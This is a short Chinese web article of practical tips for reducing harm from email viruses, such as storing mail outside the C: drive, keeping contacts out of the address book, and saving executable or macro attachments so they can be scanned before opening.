除了可以用防火墙和杀毒软件来防杀邮件病毒外，还可以用以下方式配合来减少邮件病毒的危害： 1、设定邮件的路径在C盘以外，因为C分区是病毒攻击频率最高的地方，万一受到防火墙不能过滤的新型病毒攻击，受到的损失也可减少， 2、收到新邮件尽量使用“另存为”选项为邮件做备份（注意分类储存，不要在同一根目录下放全部的邮件）此时还可以趁机为邮件起一个更为一目了然的名字

3、尽量在“通讯簿”不要设置太多的名单，如果要发送新邮件，可以进入邮件的储存目录，打开客户的发来的邮件，利用“回复”功能来发送新邮件（删除原有内容即可）；如果客户或朋友较多，利用回复不方便，可以新建一个文本文件（自己做好备份，记得路径及名称)，把客户的邮件地址一一列入其中，要发新邮件的时候，利用CTRL+C, CTRL+V把客户邮件地址粘贴到“收件人”栏中去――这样虽然麻烦一点，但是有效地防止了邮件病毒的进一步传播，须知现在的邮件病毒变种更新既多又快，防杀难免有漏洞，病毒一发作，就自动复制无数拷贝发送到“通讯簿”里所有的用户，

用此法可以避免病毒的扩散，特别是有商业关系的客户不会因此受到牵连，发生误会从而影响合作关系。此法还可起到保密客户的作用，因为名单文本的目录和名称只有本机主人才知道。 4、遇到带可执行文件（*.EXE, *.COM）或带有宏功能的附件（*.DOC等），不要选打开，最好先选择为“另存为”到磁盘上，用杀毒软件先查杀，这是共识了。热门推荐：将IE恶意插件彻底清扫出门浅析非法操作原理及应对策略点击阅读更多学院相关文章>>

分享到